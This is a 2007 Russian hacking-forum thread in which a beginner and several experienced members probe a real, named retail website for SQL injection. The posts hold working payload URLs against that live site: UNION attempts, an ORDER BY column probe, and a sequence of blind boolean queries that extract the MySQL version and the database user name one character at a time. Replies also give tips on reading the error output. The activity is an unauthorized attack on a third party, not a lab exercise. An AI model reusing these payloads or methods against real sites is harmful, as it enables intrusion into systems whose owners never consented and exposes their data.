ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу странный SQL-injection
   
Закрытая тема
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

странный SQL-injection
  #1  
Старый 22.03.2007, 07:50
Аватар для fastnull
fastnull
Познающий
Регистрация: 05.03.2007
Сообщений: 31
Провел на форуме:
222733

Репутация: 7
По умолчанию странный SQL-injection
Вообщем так, нашёл на сайте вроде бы явную sql-injection
при вставке кавычки возвращает
http://www.injection.com/?dept=62&pid=665'

You have an error in your SQL syntax near '\'' at line 1

Вставляю
http://www.injection.com/?dept=62&pid=-999+union+select+1/*
А отображается
You have an error in your SQL syntax near 'union select 1/*' at line 1

При проверке
http://www.injection.com/?dept=62&pid=666-1
Выдаёт страницу http://www.injection.com/?dept=62&pid=665
Что бы я не вводил, выводится запрос в тексте после +union
Что такое - не получается
Я только учусь и надёюсь на ваш ценный совет!
Последний раз редактировалось fastnull; 22.03.2007 в 07:59..
 

  #2  
Старый 22.03.2007, 08:09
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию
Полный линк на сайт в студию...
 

  #3  
Старый 22.03.2007, 08:16
Аватар для fastnull
fastnull
Познающий
Регистрация: 05.03.2007
Сообщений: 31
Провел на форуме:
222733

Репутация: 7
По умолчанию
Цитата:
Сообщение от ice1k  
Полный линк на сайт в студию...
Пожалуйста!
http://www.mykidsfair.com/?dept=62&pi=665
 

  #4  
Старый 22.03.2007, 08:30
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию
ну тогда правильный линк
http://www.mykidsfair.com/?dept=62&pid=665
 

  #5  
Старый 22.03.2007, 08:31
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию
вот это тоже интересно...
http://www.mykidsfair.com/?dept=xxx
 

  #6  
Старый 22.03.2007, 08:46
Аватар для fastnull
fastnull
Познающий
Регистрация: 05.03.2007
Сообщений: 31
Провел на форуме:
222733

Репутация: 7
По умолчанию
Цитата:
Сообщение от aka PSIH  
вот это тоже интересно...
http://www.mykidsfair.com/?dept=xxx
Круто! А я и не заметил, тогда сейчас попробую подобрать название колонки

А что можно поиметь вот с этого сообщения

http://www.mykidsfair.com/?dept=-999+union+select+1,2/*

You have an error in your SQL syntax near 'union select 1,2/* AND page_class = 4' at line 1
Что за параметр page_class = 4 ?
Последний раз редактировалось Koller; 22.03.2007 в 11:28..
 

  #7  
Старый 22.03.2007, 09:28
Аватар для _Pantera_
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию
http://www.mykidsfair.com/?dept=62+order+by+13--

на сайте стоит 3 версия мускула, это мы узнаем по 1 цифре след запроса
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(version (),1,1)))=51

а потом вытягиваем USER()
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 1,1)))=99
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 2,1)))=106
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 3,1)))=104
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 4,1)))=97
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 5,1)))=114
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 6,1)))=109
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 7,1)))=97
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 8,1)))=110
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 9,1)))=64
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 10,1)))=108

в итоге получаем char() кодировку имени юзера
99, 106, 104, 97, 114, 109, 97, 110, 64, 108(остановился на 108, так как по практике могу сказать что там идет localhost)

ps мазахисты могут еще повытягивать......
 

  #8  
Старый 22.03.2007, 10:44
Аватар для p-range
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
Отправить сообщение для p-range с помощью ICQ
По умолчанию
Цитата:
А что можно поиметь вот с этого сообщения

http://www.mykidsfair.com/?dept=-999+union+select+1,2/*

You have an error in your SQL syntax near 'union select 1,2/* AND page_class = 4' at line 1
Что за параметр page_class = 4 ?
в 3-м мускуле нету оператора union
 

  #9  
Старый 22.03.2007, 15:27
Аватар для fastnull
fastnull
Познающий
Регистрация: 05.03.2007
Сообщений: 31
Провел на форуме:
222733

Репутация: 7
По умолчанию
Спасибо огромное всем!!! Просто я хакинг начал изучать только в начале декабре 2006
 

  #10  
Старый 22.03.2007, 23:36
Аватар для k1b0rg
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию
а толку от этой скули?
можно узнать тока версию, юзера и название базы данных.
 
Закрытая тема
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ